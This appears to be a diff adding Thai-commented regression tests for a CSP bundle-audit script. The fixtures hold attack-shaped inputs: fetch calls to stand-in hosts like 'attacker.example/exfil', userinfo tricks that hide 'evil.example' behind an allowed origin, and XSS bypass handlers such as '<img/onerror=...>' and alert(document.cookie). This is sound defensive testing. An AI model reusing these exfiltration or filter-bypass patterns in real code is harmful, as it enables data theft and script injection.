+  // คู่ตรงข้ามของเทสบน — การถอด form-action ออกจาก allowlist **รวม** ต้องไม่ไปแตะเส้นทางที่
+  // บริบทบอก directive ได้เอง (`TAG_ATTRIBUTE_DIRECTIVES`) ซึ่งเทียบกับ form-action ตรง ๆ อยู่แล้ว
+  const policy = "default-src 'self'; script-src 'self'; form-action https://forms.example.com";
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><form action="https://forms.example.com/submit"></form></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    assert.deepEqual(findings, [], `form-action อนุญาตปลายทางนี้ไว้จริง: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('directive ที่ไม่ใช่ fetch และไม่ได้ประกาศ ต้องไม่ยืม default-src มาจำกัด (ไม่ประกาศ = ไม่จำกัด)', () => {
+  // `default-src` เป็น fallback ของ **fetch directive** เท่านั้น — `form-action` / `frame-ancestors`
+  // / `base-uri` ไม่มี fallback ตาม spec · policy ที่ไม่ประกาศ form-action จึงไม่ได้จำกัดการ submit
+  // เลย แต่ของเดิม `originsForDirective()` fallback ให้ทุก directive ทำให้ gate ฟ้อง <form action>
+  // ที่ browser ปล่อยผ่าน = false positive ที่หลับอยู่จนกว่าจะมีคนถอด form-action ออกจาก policy
+  const policy = "default-src 'self'; script-src 'self'";
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><form action="https://forms.example.com/submit"></form></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    assert.deepEqual(findings, [], `ไม่ประกาศ form-action = ไม่จำกัดการ submit: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('directive ที่ไม่ใช่ fetch ซึ่งประกาศไว้ ต้องยังจำกัดตามที่ประกาศ (กันแก้เกิน)', () => {
+  // คู่ตรงข้ามของเทสบน — "ไม่ประกาศ = ไม่จำกัด" ต้องไม่กลายเป็น "ประกาศแล้วก็ไม่จำกัด"
+  const policy = "default-src 'self'; script-src 'self'; form-action 'self'";
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><form action="https://forms.example.com/submit"></form></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    const hit = findings.find((f) => f.detail.includes('forms.example.com'));
+    assert.ok(hit, `form-action 'self' ไม่อนุญาตปลายทางนี้: ${JSON.stringify(findings)}`);
+    assert.ok(directivesOf(hit).includes('form-action'), `ต้องผูกกับ directive ที่บล็อกจริง: ${hit.directive}`);
+  } finally {
+    cleanup();
+  }
+});
+
+// ── สามสถานะของ `cleared` ในกฎ R3/R4 (review รอบที่ 12) ───────────────────────
+// `cleared` เก็บ origin ที่ **หลักฐานบริบทในไฟล์** ตัดสินแล้วว่า directive ที่คุมจริงอนุญาต
+// กฎสตริงลอยจึงต้องเงียบกับ origin เหล่านั้น — M2 ถอด directive ที่ไม่ใช่ fetch ออกจาก
+// allowlist รวมแล้ว ถ้าไม่มี cleared สตริงลอยของ origin ที่ <form action> ผ่านไปแล้วจะโดน
+// ฟ้องซ้ำเป็น false positive · ขอบเขตของการเงียบคือสิ่งที่สามเทสนี้ตรึง: เงียบได้ต้องมี
+// หลักฐานจริงในไฟล์ และเงียบไม่ลามไปถึงกฎ connect-src ซึ่งรู้บริบทดีกว่า
+
+test('มี <form> ที่ policy อนุญาตจริง → สตริงลอย origin เดียวกันต้องเงียบ (cleared)', () => {
+  // <form action> ผ่าน form-action ตรง ๆ แล้ว origin นั้นถูกเคลียร์ — สตริงลอยที่เหลือใน
+  // ไฟล์เดียวกันต้องไม่โดนฟ้องซ้ำ ถ้าถอดการเช็ค cleared ออก เทสนี้ต้องแดงทันที
+  const policy = "default-src 'self'; script-src 'self'; connect-src 'self'; form-action https://forms.example.com";
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/forms.js': `document.body.innerHTML += "<form action='https://forms.example.com/submit'></form>";const fallback="https://forms.example.com/other";`,
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('ไม่มี <form> ในไฟล์ → สตริงลอย origin เดียวกันต้องถูกฟ้อง (cleared ต้องมีหลักฐานในไฟล์)', () => {
+  // policy ประกาศ form-action ไว้อย่างเดียวไม่พอ — การเคลียร์ต้องมาจาก markup จริงในไฟล์
+  // ถ้าเคลียร์จาก policy โดยตรง (ยืม origin ของ directive ที่ไม่ใช่ fetch กลับมาอีกครั้ง)
+  // สตริงลอยจะเงียบทั้งที่ไม่มีอะไรพิสูจน์ว่าโค้ดใช้ปลายทางนี้จริง
+  const policy = "default-src 'self'; script-src 'self'; connect-src 'self'; form-action https://forms.example.com";
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/loose.js': 'const fallback="https://forms.example.com/other";',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    const hit = findings.find((f) => /forms\.example\.com/.test(f.detail));
+    assert.ok(hit, `ต้องยังฟ้องสตริงลอย: ${JSON.stringify(findings)}`);
+    assert.ok(
+      !directivesOf(hit).includes('form-action'),
+      `finding ต้องไม่อ้าง form-action เพราะมันไม่ใช่ตัวยืม origin: ${hit.directive}`,
+    );
+  } finally {
+    cleanup();
+  }
+});
+
+test('มี <form> + fetch() ไป origin เดียวกัน → fetch ต้องยังถูกจับ (กฎ connect ต้องไม่สน cleared)', () => {
+  // cleared ครอบเฉพาะกฎสตริงลอย — connect-src ตัดสินด้วยชุดของตัวเอง ถ้า isCovered ยอมรับ
+  // cleared ด้วย การมีฟอร์มในไฟล์จะกลายเป็นใบผ่านให้ยิง API ไปที่เดียวกันทั้งที่ connect-src บล็อกจริง
+  const policy = "default-src 'self'; script-src 'self'; connect-src 'self'; form-action https://forms.example.com";
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/mixed.js': `document.body.innerHTML += "<form action='https://forms.example.com/submit'></form>";fetch("https://forms.example.com/api");`,
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    const hit = findings.find((f) => directivesOf(f).includes('connect-src'));
+    assert.ok(hit, `fetch ไป origin ที่ connect-src ไม่อนุญาตต้องถูกฟ้อง: ${JSON.stringify(findings)}`);
+    assert.match(hit.detail, /forms\.example\.com/);
+  } finally {
+    cleanup();
+  }
+});
+
+test('ข้อยกเว้นทุกตัวใน NON_FETCH_DIRECTIVES ต้องมีเหตุผลเขียนกำกับ', () => {
+  // เหตุผลเดียวกับเทสของ NON_FETCHED_ORIGINS: รายการที่ทำให้ gate "มองข้าม" ของได้ ต้องเป็น
+  // การตัดสินใจที่เขียนไว้ ไม่ใช่ชื่อที่ใครสักคนเติมเข้ามาเงียบ ๆ
+  assert.ok(NON_FETCH_DIRECTIVES.size > 0);
+  for (const [directive, reason] of NON_FETCH_DIRECTIVES) {
+    assert.equal(typeof reason, 'string', `${directive} ต้องมีเหตุผล`);
+    assert.ok(reason.length >= 20, `เหตุผลของ ${directive} สั้นเกินกว่าจะอธิบายอะไรได้: "${reason}"`);
+  }
+  // fetch directive ที่ gate ใช้จริงต้องไม่หลุดเข้าไปในรายการนี้ — ถ้าหลุด gate จะเงียบทั้งเส้นทาง
+  for (const directive of ['script-src', 'connect-src', 'img-src', 'style-src', 'font-src', 'default-src']) {
+    assert.ok(!NON_FETCH_DIRECTIVES.has(directive), `${directive} คุมการโหลดจริง ห้ามอยู่ในรายการนี้`);
   }
 });
 

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -633,3 +633,106 @@ test('src และ type ของจริงต้องยังทำให�
     cleanup();
   }
 });
+
+// ── รอบรีวิวสองแกนบนคอมมิต 7ebf96c ───────────────────────────────────────────
+// สามในสี่ข้อเป็นช่อง "คลาสเดียวกับที่เพิ่งปิด" — แก้บั๊กแล้วปิดไม่ครบคลาส
+// เป็นรูปแบบที่เกิดซ้ำเป็นรอบที่สามในสาขานี้ เทสชุดนี้จึงคุมทั้งคลาส ไม่ใช่แค่เคสที่รายงาน
+
+test('//host ใน attribute ของ HTML ต้องถูกจับ ไม่ใช่แค่ใน url() และ fetch (review ก)', () => {
+  // เอกสารเขียนว่าจับ `//host` "เฉพาะที่มีบริบทบอกว่าเป็น URL" — attribute อย่าง src/href
+  // คือบริบทที่แรงกว่า url() ด้วยซ้ำ การไม่ตรวจจึงทำให้คำอธิบายข้อจำกัดบรรยายของจริงผิด
+  const { dir, cleanup } = makeDist({
+    'index.html':
+      '<!doctype html><html><head><link rel="stylesheet" href="//cdn.evil.example/x.css"></head>' +
+      '<body><img src="//cdn2.evil.example/x.png"></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /cdn\.evil\.example/.test(f.detail)), `href: ${JSON.stringify(findings)}`);
+    assert.ok(findings.some((f) => /cdn2\.evil\.example/.test(f.detail)), `src: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('attribute ที่เป็น path สัมพัทธ์หรือ origin ที่ policy อนุญาต ต้องไม่ถูกจับ (กันแก้เกิน)', () => {
+  const { dir, cleanup } = makeDist({
+    'index.html':
+      '<!doctype html><html><head><link rel="stylesheet" href="/assets/a.css">' +
+      '<link rel="preconnect" href="//fonts.gstatic.com"></head>' +
+      '<body><img src="/assets/x.png"><img src="data:image/png;base64,AAA"></body></html>',
+    'assets/a.css': '.x{color:red}',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('host ที่ไม่ได้ขึ้นต้นด้วยตัวอักษร/ตัวเลข ต้องไม่หลุด (review ข)', () => {
+  // `/^\/\/[a-zA-Z0-9]/` ตัด IPv6 literal และ host ที่ขึ้นต้นด้วย _ ทิ้งเป็น null แล้วกฎรวม
+  // ก็มองไม่เห็นเพราะบังคับ https?:// เหมือนกัน = ไม่มีกฎไหนครอบ ซึ่งคือเหตุผลเดิมของ review #1
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/v6.js': 'fetch("//[2001:db8::1]/exfil");',
+    'assets/us.js': 'fetch("//_x.attacker.example/exfil");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /2001:db8/.test(f.detail)), `IPv6: ${JSON.stringify(findings)}`);
+    assert.ok(findings.some((f) => /_x\.attacker\.example/.test(f.detail)), `underscore: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('URL รูปเต็มต้องถูกนับครั้งเดียว ไม่ใช่ซ้ำจากสองกฎ (review ค)', () => {
+  // CSS_URL เลิกบังคับ `//` แล้วจึงทับกับ generic scan · flag i ยังทำให้ `new URL(` เข้าข่ายด้วย
+  // ผลคือจำนวนครั้งในข้อความ error ผิดเป็นเท่าตัว ซึ่งขัด Global Constraint ที่ว่า error ต้องบอก
+  // "สิ่งที่เจอ" ให้ตรง — ตัวเลขที่ผิดคือข้อมูลที่ผิด ไม่ใช่แค่ความสวยงาม
+  const { dir, cleanup } = makeDist({
+    'a.css': '.h{background:url(https://cdn.example.com/y.png)}',
+    'b.js': 'const u=new URL("https://evil.example/x");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    for (const origin of [/cdn\.example\.com/, /evil\.example/]) {
+      const hit = findings.find((f) => origin.test(f.detail));
+      assert.ok(hit, JSON.stringify(findings));
+      assert.doesNotMatch(hit.detail, /ครั้งในไฟล์นี้/, `เจอครั้งเดียวต้องไม่มีจำนวนครั้ง: ${hit.detail}`);
+    }
+  } finally {
+    cleanup();
+  }
+});
+
+test('origin เดียวที่โผล่หลายครั้งจริง ต้องยังรายงานจำนวนครั้งถูกต้อง (กันแก้เกิน)', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/many.js': 'a("https://x.example/1");b("https://x.example/2");c("https://x.example/3");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const hit = findings.find((f) => /x\.example/.test(f.detail));
+    assert.ok(hit, JSON.stringify(findings));
+    assert.match(hit.detail, /\(3 ครั้งในไฟล์นี้\)/, hit.detail);
+  } finally {
+    cleanup();
+  }
+});
+
+test('แท็กที่ quote ปิดไม่ครบต้องไม่ถูกเชื่อว่ามี src (review ง)', () => {
+  // `<script data-x=" src=y>` ทำให้ตัวแตก attribute ไปเจอ `src=y` เป็น attribute ใหม่
+  // แล้วข้ามแท็กทั้งอัน — fail-open รูปเดียวกับ review #3 · แยก attribute ไม่ได้ = ต้องตรวจต่อ
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><script data-x=" src=y>alert(document.cookie)</script></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => f.rule === 'inline-script'), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -932,3 +932,103 @@ test('โค้ด JS ที่มีตัวดำเนินการเป�
     cleanup();
   }
 });
+
+// ── รีวิวรอบที่หก บนคอมมิต 6fd2b58 (reviewer subagent) ────────────────────────
+// คลาสเดิมยังไม่ปิด — ทั้งสามข้อล้วนเป็น "กฎเดาขอบเขตเอง แทนที่จะให้ตัว parse ตัดสิน"
+// อีกครั้ง แต่คนละที่กับรอบที่ห้า · ทุกข้อยืนยันแล้วว่า gate ตอบ PASS บนโค้ดก่อนแก้
+
+test('userinfo ที่มีอักขระซึ่ง regex เคยใช้เป็นตัวตัด ต้องไม่ทำให้ host ถูกอ่านผิด (review ซ)', () => {
+  // รอบที่ห้าปิดเฉพาะ `@` ที่ติดกับ origin — แต่ตัวตัด `, ; ( ) { }` ที่เพิ่มเข้ามาเพื่อแยก
+  // `url(a),url(b)` กลายเป็นช่องใหม่ทันที เพราะอักขระเหล่านี้อยู่ในส่วน userinfo ได้ตามมาตรฐาน
+  // URL และ host จริงถูกตัดสินด้วย `@` ตัวสุดท้าย — ยิ่ง policy อนุญาต origin ไว้มาก
+  // ช่องยิ่งกว้าง เพราะทุก origin ที่อนุญาตกลายเป็นคำนำหน้าที่ยืมได้ (คำอธิบายเดียวกับ review ฉ)
+  for (const separator of [',', ';', '(', '{', '}']) {
+    const { dir, cleanup } = makeDist({
+      ...cleanFiles,
+      'assets/userinfo.js': `const u = "https://fonts.gstatic.com${separator}x@evil.example/steal";`,
+    });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      assert.ok(
+        findings.some((f) => /evil\.example/.test(f.detail)),
+        `ตัวคั่น "${separator}": ${JSON.stringify(findings)}`
+      );
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+test('inline event handler ที่ไม่มีช่องว่างนำหน้าต้องถูกจับ (review ฌ)', () => {
+  // `/\son[a-z]+/` บังคับ whitespace นำหน้า แต่ HTML ไม่ได้บังคับ — `<img/onerror=…>` เป็น
+  // สำนวน bypass ตัวกรอง XSS ที่ใช้กันมานาน · ไฟล์นี้มีตัวแตก attribute ของตัวเองอยู่แล้ว
+  // (parseAttributes ที่ branch <script> ใช้) การยิง regex ดิบทับ attrs จึงเป็นการเดาซ้ำซ้อน
+  const cases = {
+    'slash.html': '<!doctype html><html><body><img/onerror="alert(1)"></body></html>',
+    'selfclose.html': '<!doctype html><html><body><img src=x /onerror="alert(1)"></body></html>',
+    'afterquote.html': '<!doctype html><html><body><a href="x"onclick="alert(1)">t</a></body></html>',
+  };
+  for (const [name, content] of Object.entries(cases)) {
+    const { dir, cleanup } = makeDist({ ...cleanFiles, [name]: content });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      assert.ok(
+        findings.some((f) => f.rule === 'inline-event-handler'),
+        `${name}: ${JSON.stringify(findings)}`
+      );
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+test('แท็กที่ยาวเกินลิมิตต้องถูกฟ้องว่าตรวจไม่ได้ ไม่ใช่ข้ามเงียบ ๆ (review ญ)', () => {
+  // "ไม่รู้" ต้องไม่กลายเป็น "สะอาด" — attribute ที่ยาวเกิน OPEN_TAG_SCAN_LIMIT ทำให้อ่าน
+  // แท็กไม่ครบ แล้วกฎ handler เลือกเงียบ · เส้นแบ่งอยู่ใกล้ของจริงกว่าที่คิด: assetsInlineLimit
+  // ของ Vite เป็น 4096 ไบต์ = ~5,461 ตัวอักษรเมื่อ base64 ซึ่งเกินลิมิตนี้ทันที
+  const long = 'A'.repeat(4200);
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'huge.html': `<!doctype html><html><body><img src="data:image/png;base64,${long}" onerror="alert(1)"></body></html>`,
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.length > 0, `ต้องมี finding สักอย่าง: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('โค้ด JS ที่มีตัวดำเนินการเปรียบเทียบ **และมี `>` อยู่ในไฟล์** ต้องไม่ถูกจับ (review ฎ)', () => {
+  // เทส "กันแก้เกิน" ของรอบที่ห้าใช้ fixture ที่ไม่มี `>` เลยสักตัว ทุก pseudo-tag จึง
+  // terminated:false แล้ว guard ก็ข้ามให้ = เทสเขียวด้วยเหตุผลคนละอย่างกับที่มันอ้างว่าปกป้อง
+  // arrow function ตัวเดียว (มีในทุก bundle สมัยใหม่) ทำให้ \` once = \` ถูกจับเป็น handler ทันที
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/cmp.js': 'const r = a<b && once = true; const s = x<y && only = 2; el.onclick = go; const f = x=>x;',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const noise = findings.filter((f) => f.rule === 'inline-event-handler');
+    assert.deepEqual(noise, [], JSON.stringify(noise));
+  } finally {
+    cleanup();
+  }
+});
+
+test('attribute ที่เอกสารบอกว่าตรวจ ต้องถูกตรวจจริง (review ฏ — อ้างว่าครอบ ทั้งที่ไม่ครอบ)', () => {
+  // เอกสารระบุ `data` อยู่ในรายการ attribute ที่ตรวจ แต่กฎไม่เคยมี — `<object data="//host">`
+  // จึงผ่านฉลุยขณะที่ `<embed src="//host">` ในไฟล์เดียวกันถูกจับ · ผลกระทบจริงต่ำเพราะ
+  // policy ตั้ง object-src 'none' แต่ "อ้างว่าครอบ ทั้งที่ไม่ครอบ" คือ failure mode
+  // เดียวกับตัวเลขที่เพี้ยนในเอกสาร ซึ่ง issue นี้มีเทส anti-drift กันไว้แล้วสองที่
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'obj.html': '<!doctype html><html><body><object data="//evil.example/x.swf"></object></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /evil\.example/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -435,3 +435,127 @@ function runCli(args) {
     });
   });
 }
+
+// ── รอบรีวิวสองแกน (2026-08-20) ─────────────────────────────────────────────
+// เทสด้านล่างมาจาก finding ที่พิสูจน์ด้วยการรันจริง ไม่ใช่การอ่านโค้ดอย่างเดียว
+// ทุกตัวต้อง "แดง" บนโค้ดก่อนแก้ ถ้าตัวไหนเขียวตั้งแต่แรกแปลว่าเทสนั้นไม่มีค่า
+
+test('URL ที่ถูก fetch ต้องเทียบกับ connect-src ไม่ใช่ allowlist รวมทุก directive (review C1)', () => {
+  // ของเดิม allowedOriginsFrom() ยุบทุก directive เป็น Set เดียว → origin ที่ policy
+  // อนุญาตไว้เพื่อ "โหลดฟอนต์" กลายเป็นใบผ่านให้ "ยิง API" ด้วย ทั้งที่ connect-src เป็น
+  // 'self' อย่างเดียว นี่คือความเสี่ยงข้อ 1 ในเอกสาร (VITE_API_URL แบบ absolute) ที่ gate
+  // นี้มีไว้จับโดยตรง — pass ตรงนี้คือ false clean ไม่ใช่ bundle สะอาด
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/api.js': 'export const load = () => fetch("https://fonts.gstatic.com/v1/records");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const hit = findings.find((f) => /fonts\.gstatic\.com/.test(f.detail));
+    assert.ok(hit, `ต้องจับได้ เพราะ connect-src ไม่มี gstatic: ${JSON.stringify(findings)}`);
+    assert.equal(hit.directive, 'connect-src', 'ต้องผูกกับ directive ที่บล็อกมันจริง');
+  } finally {
+    cleanup();
+  }
+});
+
+test('URL ที่ policy อนุญาตใน connect-src ต้องผ่านแม้ถูก fetch (กฎมาจาก policy ไม่ใช่รายชื่อ)', () => {
+  // คู่ตรงข้ามของเทสบน — กันไม่ให้แก้ C1 แล้วกลายเป็นฟ้องทุก fetch ที่เป็น absolute
+  const policy = POLICY.replace("connect-src 'self'", "connect-src 'self' https://api.example.com");
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/api.js': 'fetch("https://api.example.com/v1/records");',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('finding ของ origin ต้องระบุ directive ตาม policy จริง ไม่ใช่รายการที่พิมพ์ค้างไว้', () => {
+  // ของเดิม hardcode 'connect-src / img-src / font-src' ซึ่งตกหล่น style-src ที่ policy มีจริง
+  // ขัด Global Constraint ของแผน: "ต้องบอก ไฟล์ + สิ่งที่เจอ + directive ไหนที่จะบล็อกมัน"
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/bg.css': '.hero{background:url(https://cdn.example.com/bg.png)}',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const hit = findings.find((f) => /cdn\.example\.com/.test(f.detail));
+    assert.ok(hit, JSON.stringify(findings));
+    assert.match(hit.directive, /style-src/, `directive ที่รายงานต้องมาจาก policy: ${hit.directive}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('chunk ที่มีทั้ง HTML fragment และโค้ด JS ปกติ ต้องไม่ให้ false positive (review C2)', () => {
+  // c8bc7cc แก้ M-A ด้วย guard ระดับ **ไฟล์** — พอ chunk เดียวมีสตริง `<script` ปนอยู่
+  // ทั้งไฟล์ถูกพลิกเป็นโหมด HTML แล้ว ` once = ` / ` only = ` ก็ถูกจับผิดกลับมาเหมือนเดิม
+  // เทส M-A เดิมใช้ไฟล์ที่ไม่มี `<script` จึงมองไม่เห็นช่องนี้
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/mixed.js': 'const tpl = "<script>window.x=1<\\/script>";\nlet once = true;\nconst only = 1;\nel.onload = fn;\n',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const noise = findings.filter((f) => f.rule === 'inline-event-handler');
+    assert.deepEqual(noise, [], `โค้ด JS ปกติต้องไม่ถูกจับเป็น handler: ${JSON.stringify(noise)}`);
+    assert.ok(
+      findings.some((f) => f.rule === 'inline-script'),
+      'แต่ <script> ที่ฝังอยู่จริงต้องยังถูกจับ'
+    );
+  } finally {
+    cleanup();
+  }
+});
+
+test('<script></script> ที่ไม่มีเนื้อหาต้องไม่ถูกจับ (review C3)', () => {
+  // spec R1 เขียนว่า "ไม่มี inline <script> **ที่มีเนื้อหา**" — แท็กว่างเปล่า browser ไม่บล็อก
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><head><script></script><script>  </script></head><body></body></html>',
+    'assets/index-abc.js': 'const a=1;export{a};',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('url() แบบ protocol-relative ใน CSS ต้องถูกจับ ไม่ใช่รอดเพราะไม่มี scheme', () => {
+  // regex เดิมบังคับ `https?://` → `url(//cdn.example.com/x)` ซึ่ง browser โหลดจริง
+  // (สืบ scheme จากหน้าเว็บ) รอดไปเงียบ ๆ ทั้งที่เอกสารบอกว่าครอบ url() ภายนอกแล้ว
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/bg.css': '.hero{background:url(//cdn.example.com/bg.png)}',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(
+      findings.some((f) => /cdn\.example\.com/.test(f.detail)),
+      JSON.stringify(findings)
+    );
+  } finally {
+    cleanup();
+  }
+});
+
+test('ตัวเลขจำนวนเทสในเอกสารต้องตรงกับของจริง (anti-drift — เคยผิดมาแล้วสองรอบ)', () => {
+  // เอกสารเคยอ้างว่าตรวจ "6 จาก ~24 chunk" แล้วผิด · เขียน "18 เทส" แล้วผิดอีก ทั้งที่คอมมิต
+  // ที่ใส่ตัวเลขนั้นชื่อว่า "แก้เอกสารที่อ้างตัวเลขต่ำกว่าจริง" — ตัวเลขที่ต้องพึ่งคนอัปเดตเอง
+  // จะเพี้ยนเสมอ กฎของโปรเจกต์คือ "ไม่รู้" ต้องไม่กลายเป็น "สะอาด" ตัวเลขที่ตรวจไม่ได้ก็เช่นกัน
+  const self = readFileSync(fileURLToPath(import.meta.url), 'utf8');
+  const actual = (self.match(/^test\(/gm) ?? []).length;
+  const doc = readFileSync(resolve(ROOT, 'docs', 'frontend-security-headers.md'), 'utf8');
+  const claimed = doc.match(/audit-bundle-csp\.test\.mjs`\s*\((\d+)\s*เทส/);
+  assert.ok(claimed, 'ไม่พบตัวเลขจำนวนเทสในเอกสาร — ถ้าเปลี่ยนรูปประโยคต้องแก้เทสนี้ด้วย');
+  assert.equal(
+    Number(claimed[1]),
+    actual,
+    `docs/frontend-security-headers.md เขียนว่า ${claimed[1]} เทส แต่ไฟล์นี้มีจริง ${actual} เทส`
+  );
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -1,0 +1,284 @@
+import assert from 'node:assert/strict';
+import { spawn } from 'node:child_process';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { dirname, join, resolve } from 'node:path';
+import test from 'node:test';
+import { fileURLToPath } from 'node:url';
+import { auditBundle, parseCspPolicy, NON_FETCHED_ORIGINS } from '../audit-bundle-csp.mjs';
+import { parseRenderHeaders } from '../verify-live-headers.mjs';
+
+// Issue #113 (R2) — regression ของ gate ที่ตรวจ build output ว่าจะชน CSP หลัง enforce ไหม
+//
+// เทสสร้าง fixture dist ใน temp dir เสมอ **ไม่แตะ frontend/dist จริง** เพราะ dist จริงเปลี่ยน
+// ทุกครั้งที่ build — เทสที่ผูกกับมันจะพังตอนคนอื่น build ด้วยเหตุผลที่ไม่เกี่ยวกับ gate
+//
+// สิ่งที่เทสชุดนี้ปกป้อง: "ผ่าน" ต้องแปลว่า "ตรวจครบทุกไฟล์แล้วไม่เจอ" ไม่ใช่ "ไม่ได้ตรวจ"
+// (dist หายต้อง fail ไม่ใช่ผ่านเงียบ ๆ) — บทเรียนเดียวกับ "log ว่าง ≠ ปลอดภัย"
+
+const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..', '..');
+const SCRIPT = resolve(ROOT, 'scripts', 'audit-bundle-csp.mjs');
+
+/** policy ที่สะท้อน production — เทสแยกด้านล่างยืนยันว่าตรงกับ render.yaml จริง */
+const POLICY =
+  "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; " +
+  "font-src https://fonts.gstatic.com; img-src 'self' data:; connect-src 'self'; object-src 'none'; " +
+  "frame-ancestors 'none'; base-uri 'self'; form-action 'self'; report-uri /api/csp-report";
+
+const CLEAN_HTML = '<!doctype html><html><head><script type="module" crossorigin src="/assets/index-abc.js"></script></head><body><div id="app"></div></body></html>';
+
+/** สร้าง dist ชั่วคราว — คืน path พร้อมฟังก์ชันลบทิ้ง */
+function makeDist(files) {
+  const dir = mkdtempSync(join(tmpdir(), 'csp-audit-'));
+  for (const [rel, content] of Object.entries(files)) {
+    const full = join(dir, rel);
+    mkdirSync(dirname(full), { recursive: true });
+    writeFileSync(full, content);
+  }
+  return { dir, cleanup: () => rmSync(dir, { recursive: true, force: true }) };
+}
+
+const cleanFiles = {
+  'index.html': CLEAN_HTML,
+  'assets/index-abc.js': 'const a=1;fetch("/api/readyz");export{a};',
+  'assets/index-abc.css': '.x{color:red;background:url(data:image/png;base64,AAA)}',
+};
+
+function rulesOf(findings) {
+  return findings.map((f) => f.rule).sort();
+}
+
+test('bundle สะอาดต้องไม่มี finding และต้องรายงานว่าตรวจกี่ไฟล์', () => {
+  const { dir, cleanup } = makeDist(cleanFiles);
+  try {
+    const result = auditBundle(dir, POLICY);
+    assert.deepEqual(result.findings, [], JSON.stringify(result.findings));
+    assert.equal(result.scanned, 3, 'ต้องตรวจครบทุกไฟล์ ไม่ใช่แค่ไฟล์แรก');
+  } finally {
+    cleanup();
+  }
+});
+
+test('inline <script> ที่มีเนื้อหาต้องถูกจับ และผูกกับ script-src', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'index.html': '<!doctype html><html><head><script>window.__BOOT__=1</script></head><body></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(rulesOf(findings).includes('inline-script'), JSON.stringify(findings));
+    assert.equal(findings.find((f) => f.rule === 'inline-script').directive, 'script-src');
+  } finally {
+    cleanup();
+  }
+});
+
+test('inline event handler ใน HTML ต้องถูกจับ (script-src บล็อกเหมือน inline script)', () => {
+  const { dir, cleanup } = makeDist({
